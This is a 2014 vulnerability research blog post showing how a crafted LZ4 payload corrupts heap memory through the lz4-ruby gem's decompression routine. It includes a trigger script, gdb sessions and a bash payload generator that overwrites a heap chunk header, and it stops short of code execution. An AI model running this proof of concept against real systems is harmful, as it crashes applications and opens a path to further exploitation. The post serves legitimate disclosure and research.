Wednesday, July 9, 2014

The LZ4-Ruby Two Hour Challenge

I'm a Ruby Virgin

So, I never found Ruby all that intriguing. It's just not that exciting to me. Sure, I can audit your Ruby on Rails app, but have I ever delved into the internals of Ruby to attack the language itself? Nope. Not even remotely interested. 

Until today! 

I noticed that Ruby's lz4-ruby package is still vulnerable to the LZ4 memory corruption bug. Since this variant uses the LZ4_decompress_safe routine, I thought it was time to finally dive into the disgusting cesspool that is Ruby. 

I downloaded the latest RVM to my 32-bit Debian 7.5.0 test-bed and went for a Polar Bear plunge. After installing the latest version of Ruby (2.1.2p95 2014-05-08 revision 45877), I went to work. 

Having a lot to do today, I only had two hours free to build and write up an attack for this platform. I'm still on the clock, so let's see how much info I can spill in the few minutes I have left. 

To follow along and install the ruby gem, simply run 

$ gem install lz4-ruby 

Once installed, you'll find that the gem can be referenced easily from the Ruby command line "irb". Since irb is horrible, we'll just throw together a quick little script. I'm using the payload from my Python attack as a starting point, so feel free to browse to the script embedded in that blog post in another tab. 

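require 'lz4-ruby'

puts "ruby lz4 exploit -"

# read the whole payload file into a string
f = File.open("./ruby.lz4", "r")
d = f.read

# pause for a few seconds so a debugger can interrupt once the gem is loaded
$i = 0
while $i < 3 do
        puts "."
        sleep 1
        $i += 1
end

# hand the payload to lz4-ruby's uncompress routine
LZ4::uncompress(d)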

Above is the script I'm using to open and pass my payload to lz4-ruby's uncompress routine. This routine eventually calls our dear old friend LZ4_decompress_safe, which should be invulnerable to our attack! 

donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit -
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `uncompress': Compressed data is maybe corrupted. (LZ4Internal::Error)
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `decompress'
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:36:in `uncompress'
        from ./test.rb:16:in `<main>'


Aw, crap! So, I guess it's not vulnerable right off the bat. Analyzing the Ruby bindings shows that there is a funny little attribute of the Ruby platform that is screwing up our attack.

static VALUE lz4internal_uncompress(VALUE self, VALUE input, VALUE in_size, VALUE offset, VALUE out_size) {
  const char *src_p;
  int src_size;

  int header_size;

  VALUE result;
  char *buf;
  int buf_size;

  int read_bytes;

  Check_Type(input, T_STRING);
  src_p = RSTRING_PTR(input);
  src_size = NUM2INT(in_size);

  header_size = NUM2INT(offset);
  buf_size = NUM2INT(out_size);

  result = rb_str_new(NULL, buf_size);
  buf = RSTRING_PTR(result);

  read_bytes = LZ4_uncompress_unknownOutputSize(src_p + header_size, buf, src_size - header_size, buf_size);
  if (read_bytes < 0) {
    rb_raise(lz4_error, "Compressed data is maybe corrupted.");
  }

  return result;
}

The function above is the Ruby version of the LZ4 bindings, which you can view on GitHub. Notice the use of 'header_size'. Oddly enough, the Ruby LZ4 bindings have their own concept of a header, which is entirely different from the four byte little-endian header used by every other package (including Python). 

Even more amusing is the fact that the size of the output buffer is a part of the header. The header size is defined by the number of bytes at the start of the payload that have the high bit (0x80) set, plus the one byte that ends the run. This is because Ruby is interpreting this value in the payload as a Ruby Integer. This means for each byte with the high bit set (0x80) it will presume the subsequent byte in the payload is a part of the integer value to be constructed. This is a very common (but annoying) sequence that anyone familiar with ASN.1/etc will recognize instantly. 
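
As a rough illustration of that encoding, here is a minimal Ruby sketch of a little-endian, seven-bits-per-byte decoder. decode_varbyte is a hypothetical helper of mine, not something lz4-ruby exports, and the byte order is an assumption. Fed the "\x82\x82\x82\x7f" header from the payload script at the end of this post, it does reproduce the maxOutputSize of 266371330 seen in the gdb session further down.

```ruby
# Sketch of a little-endian base-128 ("varbyte") decoder.
# decode_varbyte is a hypothetical helper, not part of lz4-ruby.
# Returns [decoded value, number of header bytes consumed].
def decode_varbyte(data)
  value = 0
  shift = 0
  data.each_byte.with_index do |byte, index|
    value |= (byte & 0x7f) << shift                 # low seven bits carry data
    return [value, index + 1] if (byte & 0x80).zero? # high bit clear ends the run
    shift += 7
  end
  raise ArgumentError, "header is not terminated"
end

size, header_len = decode_varbyte("\x82\x82\x82\x7f".b)
puts "output buffer size: #{size}, header length: #{header_len}"
```

The header length comes out as 4. The offset=9 that gdb prints for lz4internal_uncompress is the same 4 in MRI's tagged Fixnum form (2 * 4 + 1).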

So, to tell the Ruby bindings how much string memory to allocate, we simply stuff a large integer into the header of our payload. Because I don't really care about this value and just want a large enough buffer for my payload, I threw in some random crap (mostly due - again - to time). 

donb@debian:~/lz4$ printf "\x80\x81\x82\x7f" > ruby_header.lz4
donb@debian:~/lz4$ cat ruby_header.lz4 test.lz4 > ruby.lz4

Unfortunately, this also fails. Why? Because the LZ4_decompress_safe routine does have one extra check that the LZ4_uncompress function Python uses does not have. It validates that the length of the data to be copied does not exceed the size of the input buffer. We exceed it by just a few bytes in my Python payload, which doesn't matter because of the way LZ4 parses the data. But, the check is a small bump in the road, so we want to avoid it. 

To do so, simply create a footer file that gives us ample room to overwrite whatever the heck we want. As a simple example, I just created an 8k file composed of the letter 'x'.

donb@debian:~/lz4$ perl -e 'print "x" x 8192' > footer.lz4
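
To make the size of that footer less arbitrary: the last literal run in the payload script at the end of this post declares 8192 bytes, so 8192 bytes of input have to follow it. The Ruby sketch below checks that sum, assuming the usual LZ4 literal-length encoding (high nibble of the token, then extension bytes added until one is below 255). literal_run_length is a made-up helper name.

```ruby
# Sketch: how many literal bytes does a token plus its extension bytes declare?
# literal_run_length is a hypothetical helper for illustration only.
def literal_run_length(token, extension_bytes)
  length = token >> 4            # high nibble holds the literal length
  return length if length < 15   # 15 means "more length bytes follow"
  extension_bytes.each do |byte|
    length += byte
    break if byte != 0xff        # a byte below 255 ends the length field
  end
  length
end

# "\xf0", then 32 bytes of 0xff, then "\x11", as in the payload script
declared = literal_run_length(0xf0, [0xff] * 32 + [0x11])
footer   = "x" * 8192

puts "declared literal run: #{declared} bytes"
puts "footer supplies:      #{footer.bytesize} bytes"
```

Both numbers are 8192, so the input-length check has nothing to complain about.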

Crashing LZ4_decompress_safe

So, now we can construct the appropriate payload and be on our way. For simplicity, I adjusted my payload script to construct "ruby.lz4" by concatenating the header, body, and footer within the script. 

donb@debian:~/lz4$ ./ 
donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit -
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28: [BUG] Segmentation fault at 0xa5afeff8
ruby 2.1.2p95 (2014-05-08 revision 45877) [i686-linux]

Excellent! That's a great start. Let's spin up gdb and see why we're segfaulting. Now, you might have asked yourself "why did he put the while loop with the sleep in the Ruby script?". Now you'll know. 

Because Ruby loads libraries dynamically based on the 'require' statement, this is just a simple way of breaking in the debugger at a point when all requisite libraries should have been loaded. That way, I can simply break in gdb, adjust my next breakpoint, and be on my way. 

donb@debian:~/lz4$ gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/".
[New Thread 0xb7936b70 (LWP 7161)]
ruby lz4 exploit -
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c

Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {

As you can see above, I simply insert a breakpoint for LZ4_decompress_safe and go on about my business. But, we can notice something is wrong right off the bat. The address in memory passed to the decompression routine as a destination is a bit too "even" for my taste. 

Usually when I see a pointer passed to a function that sits exactly eight bytes past a PAGE_SIZE boundary, I know I'm in the Linux heap. This is a bad thing because the Linux heap is harder to exploit these days than ever. The only realistic attack that can occur when instrumenting the Linux heap is an attack against the application's logic. And to do this, you'd have to align two pages close together in a predictable way. This requires memory pressure and a lot of other b.s. that I am not going to get into here. 

(gdb) x/8xw dest 
0xa5aff008:     0x00000000      0x00000000      0x00000000      0x00000000
0xa5aff018:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 8
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 16
0xa5afeff8:     Cannot access memory at address 0xa5afeff8

A few simple tests show that I'm right. Valid memory stops at the start of this page. Since we are using a test application, nothing will be in memory prior to that page. 
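
The size word sitting at dest - 4 tells the same story. The Ruby sketch below decodes it, assuming the 32-bit glibc malloc chunk layout where the low three bits of the size field are flags and 0x2 means the chunk was mmapped. The constant and helper names are mine; the two input values are copied from the gdb output above.

```ruby
# Sketch: decode a 32-bit glibc malloc chunk size field.
# describe_chunk is a hypothetical helper for illustration only.
PAGE_SIZE  = 4096
IS_MMAPPED = 0x2   # glibc flag bit: chunk was obtained with mmap
FLAG_MASK  = 0x7   # low three bits of the size field are flags

def describe_chunk(dest, size_field)
  {
    chunk_size:  size_field & ~FLAG_MASK,          # size with the flag bits stripped
    mmapped:     (size_field & IS_MMAPPED) != 0,
    page_offset: dest % PAGE_SIZE                  # where dest sits inside its page
  }
end

info = describe_chunk(0xa5aff008, 0x0fe09002)
puts format("chunk size : 0x%08x", info[:chunk_size])
puts "mmapped    : #{info[:mmapped]}"
puts "page offset: #{info[:page_offset]}"
```

A chunk size of 0x0fe09000 is the requested 266371330 bytes rounded up to whole pages, and the mmapped flag is consistent with there being nothing mapped directly below the chunk.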

So, for fun, let's simply corrupt the header of the heap chunk just to prove we can do it reliably. This may not be useful on Linux, but there are a lot of other platforms where this is useful. Remember, Ruby is a high level language and is implemented on a lot of different platforms. So, depending on your target, Your Mileage May Vary. 

To overwrite just the header and not cause a SIGSEGV by writing to an invalid memory page, just increase the address offset in the payload by 8 bytes. This will start the copy of our data at the beginning of the heap chunk, rather than 8 bytes prior to the start of the heap chunk's valid page. 
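
Here is that arithmetic as a quick Ruby sketch. It assumes the length is the 15 from the token, plus every extension byte, plus LZ4's 4-byte minimum match, and that the 32-bit pointer addition simply wraps. The helper names are made up for illustration; the byte counts come from the payload script at the end of this post and the dest address from the gdb session above.

```ruby
# Sketch: where does the write land after the 32-bit pointer wraps?
# accumulated_length and wrapped_target are hypothetical helpers.
MASK32   = 0xffffffff
MINMATCH = 4   # LZ4's minimum match length (assumed to be added to the total)

def accumulated_length(ff_count, last_byte)
  (15 + 255 * ff_count + last_byte + MINMATCH) & MASK32
end

def wrapped_target(dest, length)
  (dest + length) & MASK32   # emulate 32-bit pointer overflow
end

dest     = 0xa5aff008
ff_count = 13 + 16_842_995   # 0xff bytes written by the payload script

[0xdd, 0xe5].each do |last|
  length = accumulated_length(ff_count, last)
  puts format("last byte 0x%02x: length 0x%08x, write starts at 0x%08x",
              last, length, wrapped_target(dest, length))
end
```

The 0xdd variant lands at 0xa5afeff8, which is the faulting address from the first crash. The 0xe5 variant lands at 0xa5aff000, the first byte of the chunk header.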

donb@debian:~/lz4$ ./ 
ruby payload is ready
donb@debian:~/lz4$ !gd
gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run ./test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby ./test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/".
[New Thread 0xb7936b70 (LWP 7358)]
ruby lz4 exploit -
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c
Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) where
#0  LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
#1  0xb7d1b9ac in LZ4_uncompress_unknownOutputSize (maxOutputSize=<optimized out>, isize=16851314, 
    dest=<optimized out>, source=0xb590800c "\017") at lz4.h:245
#2  lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:151
#3  0xb7ee24ad in call_cfunc_4 (func=0xb7d1b8f0 <lz4internal_uncompress>, recv=137898400, argc=4, 
    argv=0xb793705c) at vm_insnhelper.c:1328
#4  0xb7ee63f7 in vm_call_cfunc_with_frame (th=th@entry=0x804abc8, reg_cfp=reg_cfp@entry=0xb79b6f68, 
    ci=ci@entry=0x83a1af0) at vm_insnhelper.c:1470
#5  0xb7ef55a9 in vm_call_cfunc (ci=0x83a1af0, reg_cfp=0xb79b6f68, th=0x804abc8) at vm_insnhelper.c:1560
#6  vm_call_method (th=0x804abc8, cfp=0xb79b6f68, ci=0x83a1af0) at vm_insnhelper.c:1754
#7  0xb7eec630 in vm_exec_core (th=0x804abc8, initial=initial@entry=0) at insns.def:1028
#8  0xb7ef1672 in vm_exec (th=th@entry=0x804abc8) at vm.c:1304
#9  0xb7ef8d11 in rb_iseq_eval_main (iseqval=iseqval@entry=137109680) at vm.c:1562
#10 0xb7d99489 in ruby_exec_internal (n=0xa5aff008) at eval.c:253
#11 0xb7d9af14 in ruby_exec_node (n=n@entry=0x82c20b0) at eval.c:318
#12 0xb7d9cebc in ruby_run_node (n=0x82c20b0) at eval.c:310
#13 0x08048758 in main (argc=2, argv=0xbffff144) at main.c:36
(gdb) break *0xb7d1b9ac
Breakpoint 2 at 0xb7d1b9ac: file lz4ruby.c, line 152.
(gdb) c
Breakpoint 2, lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:152
152       if (read_bytes < 0) {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x082c6fe0      0x44332211      0x75caadde      0x76caadde
0xa5aff010:     0x88776655      0x77caadde      0x78caadde      0x79caadde

It's easy to see in the output above that now we have successfully overwritten the Linux heap header with what *should* be our Python payload, but whatever. 
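
If the words in that dump look scrambled compared to the payload, that is just x86 byte order: gdb's x/8xw prints each group of four bytes as a little-endian word. A small Ruby sketch of the same view, using the first sixteen payload bytes from the script at the end of this post (as_words is a made-up helper name):

```ruby
# Sketch: view raw payload bytes the way gdb's x/xw shows them on x86.
# as_words is a hypothetical helper for illustration only.
def as_words(bytes)
  # "V" unpacks unsigned 32-bit little-endian integers
  bytes.unpack("V*").map { |word| format("0x%08x", word) }
end

payload = "\xe0\x6f\x2c\x08\x11\x22\x33\x44\xde\xad\xca\x75\xde\xad\xca\x76".b
puts as_words(payload).join("  ")
```

This prints 0x082c6fe0, 0x44332211, 0x75caadde and 0x76caadde, matching the first row of the dump.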


This is more proof that LZ4 is a fun algorithm to play with. It's a great and useful compression scheme, but the memory corruption overflow is a lot of fun, too. 

If you end up developing a working Ruby LZ4 payload, please reach out and contact Lab Mouse.

Time's Up. The adjusted Ruby payload script is below.

Don A. Bailey
Lab Mouse Security
Founder / CEO

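#!/bin/bash
# Ruby LZ4 payload generator -
# For Testing Only. Do Not Misuse. 

# payload body; joined with the header and footer at the end
FILE=test.lz4

# append raw bytes given as printf escapes
append() {
        printf "$1" >> $FILE
}

# start from an empty file (function name assumed)
init() {
        rm -f $FILE
        touch $FILE
}

# append $1 bytes of 0xff
large() {
        x="\"\\xff\" x $1"
        perl -e "print $x" >> $FILE
}

# append $2 a total of $1 times (function name assumed; unused below)
repeat() {
        i=0
        while [ $i -lt $1 ]; do
                append "$2"
                i=$((i + 1))
        done
}

# initialize the file
init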
# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes
large 16842995
#append "\xdd"
append "\xe5"

# PyFile_Type technique
# we need 72 bytes (18 words) but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\xe0\x6f\x2c\x08"       # will point to PyFile_Type.file_dealloc()
append "\x11\x22\x33\x44"       # dummy arg for next function
append "\xde\xad\xca\x75"       # f_name
append "\xde\xad\xca\x76"       # f_mode
append "\x55\x66\x77\x88"       # dummy next function address
append "\xde\xad\xca\x77"       # f_softspace
append "\xde\xad\xca\x78"       # f_binary
append "\xde\xad\xca\x79"       # f_buf
append "\xde\xad\xca\x7a"       # f_bufend
append "\x00\x00\x00\x00"       # f_bufptr
append "\x00\x00\x00\x00"       # f_setbuf
append "\x00\x00\x00\x00"       # f_univ_newline
append "\x00\x00\x00\x00"       # f_newlinetypes
append "\x00\x00\x00\x00"       # f_skipnextlf
append "\x00\x00\x00\x00"       # f_encoding
append "\x00\x00\x00\x00"       # f_errors
append "\x00\x00\x00\x00"       # weakreflist
append "\x00\x00\x00\x00"       # unlocked_count

# don't exit with a bad ref here
append "\x00\x00"               # null ref

# last literal run (8192 bytes)
append "\xf0"                   # 15 bytes
large 32                        # (32 * 255)
append "\x11"                   # 17 completes the 8192

printf "\x82\x82\x82\x7f" > ruby_header.lz4
perl -e 'print "x" x 8192' > footer.lz4

echo 'ruby payload is ready'
cat ruby_header.lz4 test.lz4 footer.lz4 > ruby.lz4
